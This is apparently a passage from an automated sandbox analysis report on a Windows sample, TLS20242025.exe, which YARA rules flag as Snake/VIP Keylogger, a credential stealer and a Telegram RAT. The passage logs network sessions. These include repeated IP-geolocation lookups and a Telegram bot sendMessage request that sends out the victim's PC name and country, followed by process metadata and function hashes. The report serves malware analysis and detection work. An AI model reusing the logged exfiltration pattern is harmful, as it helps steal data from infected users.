2024-09-26 13:19:11 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-26 13:19:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49726	188.114.97.3	443	5576	C:\Users\user\Desktop\TLS20242025.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 13:19:12 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-26 13:19:12 UTC	680	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 13:19:12 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 21584 Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qIHXYVAiroAN7gFdXAr%2FrgMA977DLIRlFxdi5Z5xuBXj0z7vf%2FzqMabv88%2BQAb6faXyANwhLzu6cdL9QfTqt5fmJFlyWJHEY5JXl4hzqUswp%2FNNdEk7TMSd5BALOZSI%2FZ4fmCqiy"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c938b58cd4e0cc2-EWR
2024-09-26 13:19:12 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-26 13:19:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49728	188.114.97.3	443	5576	C:\Users\user\Desktop\TLS20242025.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 13:19:13 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-26 13:19:13 UTC	672	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 13:19:13 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 21585 Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CeDojy6P8%2BQ6lflm2FrwJjsuzV3qrUc2ON87cRXwfiNKBAWAAmsUSgcRkE6fC5ZPrSzByPX56h4mT09LGaFf10Ku19A7OFDS1pNweCKVDme13rwMner4oYZfgTHjEIk52oqRgtcM"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c938b5fadf3c477-EWR
2024-09-26 13:19:13 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-26 13:19:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49730	188.114.97.3	443	5576	C:\Users\user\Desktop\TLS20242025.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 13:19:14 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-26 13:19:15 UTC	678	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 13:19:14 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 21586 Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1uaBpVlNQPzMVfNS98dUe0MIL4jhlERhbqeKh7LeK3fho%2BpLEO85%2FuCxa6fj0lyV%2F3IVfqBgIT1QNCtOLmlWQ0zLQ84Er2MFqEYJ%2BmTwQX0r9qqVPjoRg9EXKsqX8h0QPPy05lVf"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c938b667f0c72c2-EWR
2024-09-26 13:19:15 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-26 13:19:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49733	188.114.97.3	443	5576	C:\Users\user\Desktop\TLS20242025.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 13:19:15 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-26 13:19:16 UTC	680	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 13:19:16 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 21588 Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ICtgGlyPwFY6wZti%2BKXA5TRxb5Kn9Vx7PEYi8A%2BGPZnKfH2kTpiT1cBjpFMsMgOocvkEoqRyUFt%2FtjyYHEIaqNNd8ftBCawuRbxY3OeLTGG%2FnLxBAOqqUTCecdUGS7VVjXN0%2BPwD"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c938b6d6a167d11-EWR
2024-09-26 13:19:16 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-26 13:19:16 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49734	149.154.167.220	443	5576	C:\Users\user\Desktop\TLS20242025.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 13:19:16 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:123716%0D%0ADate%20and%20Time:%2026/09/2024%20/%2020:05:16%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20123716%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-09-26 13:19:17 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Thu, 26 Sep 2024 13:19:16 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-26 13:19:17 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Target ID:	0
Start time:	09:19:03
Start date:	26/09/2024
Path:	C:\Users\user\Desktop\TLS20242025.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\TLS20242025.exe"
Imagebase:	0x530000
File size:	920'064 bytes
MD5 hash:	BFABEAF94D00B7C6B4AF9AA3463FF5A5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	09:19:04
Start date:	26/09/2024
Path:	C:\Users\user\Desktop\TLS20242025.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\TLS20242025.exe"
Imagebase:	0x730000
File size:	920'064 bytes
MD5 hash:	BFABEAF94D00B7C6B4AF9AA3463FF5A5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4585576245.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	6.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	4
Total number of Limit Nodes:	1

Executed Functions

Function 0275E398 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0275E3FE

Memory Dump Source

Source File: 00000000.00000002.4585036024.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2750000_TLS20242025.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: f5bc78d7a517a2f7eebf8f06c0d88cf0ec9f4b8bfaae0447fd8dfc2487c3adaf
Instruction ID: a5bb425f9a6e6d555d1d254c59f1abc3d1a51364ce4adba5eae483f8bdb25178
Opcode Fuzzy Hash: f5bc78d7a517a2f7eebf8f06c0d88cf0ec9f4b8bfaae0447fd8dfc2487c3adaf
Instruction Fuzzy Hash: 7E1113B5C003498FDB10CF9AC444BDEFBF4AF88324F10846AD829A7200D3B9A545CFA1

Function 026AD01C Relevance: .1, Instructions: 72
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.4584595908.00000000026AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 026AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_26ad000_TLS20242025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00d77397d4e856ee05216000ca7a7b7d96ffb5d55a6e787cd8ab172360c7d013
Instruction ID: 2638ff3bafcdec4e578f42cef9746d4543a3fea2c49a6c81c13c0e8c9db93d7c
Opcode Fuzzy Hash: 00d77397d4e856ee05216000ca7a7b7d96ffb5d55a6e787cd8ab172360c7d013
Instruction Fuzzy Hash: A5212275604280EFDB18DF24D9D0B26BBA1FB88314F20C56DD90A4B792C77AD847CE61

Function 026AD2BC Relevance: .1, Instructions: 72
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.4584595908.00000000026AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 026AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_26ad000_TLS20242025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a3635b06ac05e5d9e98146aa246cb163c71b8e76ad463406db1032837265b0a
Instruction ID: afa8ca8c2ae1be7f28d51c2ef6a6931dd0784bfc49efb90d79455dacac8ddca5
Opcode Fuzzy Hash: 6a3635b06ac05e5d9e98146aa246cb163c71b8e76ad463406db1032837265b0a
Instruction Fuzzy Hash: 082135B6504244EFDB04DF14D9D0B2ABBA5FB85324F24C56DD9494BB42C37AD806CEA1

Function 026AD006 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4584595908.00000000026AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 026AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_26ad000_TLS20242025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 837a54d8fb7d6d571b1263bd8d84363e6814db372231b4f7a42b0a9ac926a6dc
Instruction ID: 5ed9651c4b94488029e8d1b349782992185a6925153a74ea6190f0a0bcf88153
Opcode Fuzzy Hash: 837a54d8fb7d6d571b1263bd8d84363e6814db372231b4f7a42b0a9ac926a6dc
Instruction Fuzzy Hash: 3E2150755083C49FCB02CF14D994B15BF71EB46214F28C5DAD8498F6A7C33AD856CB62

Function 026AD2B7 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4584595908.00000000026AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 026AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_26ad000_TLS20242025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ecf76333c4857edb0cae155a2ed822a1bfe38db2c40391184a4fb299c42cee64
Instruction ID: 58490a7d08dc010e1d4a4f45cfa458319ca2cae425aebd023cb359222a47cd3d
Opcode Fuzzy Hash: ecf76333c4857edb0cae155a2ed822a1bfe38db2c40391184a4fb299c42cee64
Instruction Fuzzy Hash: 9311B276504684CFCB11CF10D5D4B1AFB61FB85324F24C6A9D8494BB56C33AD806CF91

Analysis Process: TLS20242025.exePID: 5576, Parent PID: 5748COMMON

Execution Graph

Execution Coverage:	18.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	65.8%
Total number of Nodes:	38
Total number of Limit Nodes:	5

Executed Functions

Function 067D5028 Relevance: 4.3, Strings: 1, Instructions: 3069COMMON

Download Yara Rule

Strings

N, xrefs: 067D8408

Memory Dump Source

Source File: 00000002.00000002.4590356989.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_67d0000_TLS20242025.jbxd

Similarity

API ID:
String ID: N
API String ID: 0-1130791706
Opcode ID: 4f072e66490420be21f972305d4b08b9f71c86e35500978e02b18ff33b5e6f9c
Instruction ID: 84b0f0951e3adbbbd9f27e2f861f788c3bf388a6c6bffd831d3e3bf75b755510
Opcode Fuzzy Hash: 4f072e66490420be21f972305d4b08b9f71c86e35500978e02b18ff33b5e6f9c
Instruction Fuzzy Hash: 5B73E331C1075A8EDB11EF68C844AADF7B1FF99300F55D69AE44867221EB70AAC5CF81

Function 067D9C18 Relevance: 3.5, Strings: 1, Instructions: 2263COMMON

Download Yara Rule

Strings

K, xrefs: 067DC2EB

Memory Dump Source

Source File: 00000002.00000002.4590356989.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_67d0000_TLS20242025.jbxd

Similarity

API ID:
String ID: K
API String ID: 0-856455061
Opcode ID: b60c090a24e3e93ecb89e8c3762f9d61721c9992c77ec4bf693e05681e9bf9ac
Instruction ID: bbfb6c6f13e59462b7e863346047c8497d27e5fedb290e1d62dbcd27f9c90a08
Opcode Fuzzy Hash: b60c090a24e3e93ecb89e8c3762f9d61721c9992c77ec4bf693e05681e9bf9ac
Instruction Fuzzy Hash: 4C33F370C147198EDB51EFA8C884AADF7B1FF99300F11D69AD44867225EB70AAC5CF81

Function 067D9548 Relevance: 1.9, APIs: 1, Instructions: 357
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.4590356989.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_67d0000_TLS20242025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70898bb4d335299400934fc0af0bb925d019f683ac0658e008d29dd7a3f08195
Instruction ID: 11628de9ba18119f11d382d8e99dd069b6b24105ab45d91945d2d997b455f14a
Opcode Fuzzy Hash: 70898bb4d335299400934fc0af0bb925d019f683ac0658e008d29dd7a3f08195
Instruction Fuzzy Hash: 1AF10574E00218CFDB54DFA9C884B9DFBB2BF88304F1486A9D948AB355DB719986CF50

Function 067D1E70 Relevance: 1.4, Strings: 1, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

8, xrefs: 067D1E75

Memory Dump Source

Source File: 00000002.00000002.4590356989.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_67d0000_TLS20242025.jbxd

Similarity

API ID:
String ID: 8
API String ID: 0-4194326291
Opcode ID: 47fe97ad29dd0fe06ab8371c14721846453eed52d350567854af223c9f70ee83
Instruction ID: a5c2c7e0acee7aef114f00ee096b80029c767502c87862270324799be4355afb
Opcode Fuzzy Hash: 47fe97ad29dd0fe06ab8371c14721846453eed52d350567854af223c9f70ee83
Instruction Fuzzy Hash: 73519A71E016588BEB58CF6BC94479AFAF3AFC9204F14C1E9C40CA6254EB740A868F50

Function 0105A088 Relevance: .9, Instructions: 900COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4584968696.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1050000_TLS20242025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43f830f7a919d65b00d70453ed4946875bbaee8b3d69f5d4e298c5c0557edaff
Instruction ID: deeaad6aa1d1f578a4f6997f0c071b13226ae94e12ebed5272591428a1fad23a
Opcode Fuzzy Hash: 43f830f7a919d65b00d70453ed4946875bbaee8b3d69f5d4e298c5c0557edaff
Instruction Fuzzy Hash: E6826F34B00209DFCB55CFA8C584AAFBBF2FF88310F158699E9559B266D730E981CB51

Function 067D0B30 Relevance: .7, Instructions: 709
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.4590356989.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_67d0000_TLS20242025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc9265282c5aaf43ae0fa69c58f5ca77fc0cdd7575f5d18e7493c91424c5b86a
Instruction ID: 5a597e1518bb41282fac9159084742a32e4d210f71a5d1fac63d4c72417f3ca1
Opcode Fuzzy Hash: bc9265282c5aaf43ae0fa69c58f5ca77fc0cdd7575f5d18e7493c91424c5b86a
Instruction Fuzzy Hash: C672ED74E01269CFDBA4DF69C984BEDBBB2BB49300F5495E9D408A7255EB309E81CF40

Function 010569A0 Relevance: .5, Instructions: 515COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4584968696.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1050000_TLS20242025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8e4e663da216f8227505e9064b4b59c0dbdc6fd3c9d3931ac8a13b6b6b2ba39
Instruction ID: 48b021e52e610eb4c29127d1537b0aa48468eca8878d93c8d9902b4c6b5ab319
Opcode Fuzzy Hash: a8e4e663da216f8227505e9064b4b59c0dbdc6fd3c9d3931ac8a13b6b6b2ba39
Instruction Fuzzy Hash: 3112BE70A002198FDB58DFA9C854BAEBBF6FF88300F508569E9459B395DF319D81CB90

Function 01056FC8 Relevance: .5, Instructions: 451
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.4584968696.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1050000_TLS20242025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e9363c1e148e6602802b0b39746122b728e55e4da8ce3cd42194ea0f87b603a
Instruction ID: b9dfaa6064f30b8ff96e29a8788e7e4b2fee669273187e68ee4d6f702c24a1b3
Opcode Fuzzy Hash: 7e9363c1e148e6602802b0b39746122b728e55e4da8ce3cd42194ea0f87b603a
Instruction Fuzzy Hash: 50026F30A00219DFDB95CF68C884AAEBFF2FF88314F9584A9E955AB265D730D841DF50

Function 01053E09 Relevance: .4, Instructions: 422
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.4584968696.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1050000_TLS20242025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bee8f21aa3e53f8e5e728d97e19801426105badb7ae13498765eea4a9f51ccfa
Instruction ID: 71f0942fa5a5b48470b1977cedd025b2c0dab25591c116090f50659654a5d686
Opcode Fuzzy Hash: bee8f21aa3e53f8e5e728d97e19801426105badb7ae13498765eea4a9f51ccfa
Instruction Fuzzy Hash: 3AF15C74F00249CFDB58DFB5D8945AEBBB2BF88310B148569E846EB358DB399C42CB50

Function 067DE258 Relevance: .3, Instructions: 268
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.4590356989.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_67d0000_TLS20242025.jbxd

Similarity

API ID:
String ID:
API String ID:
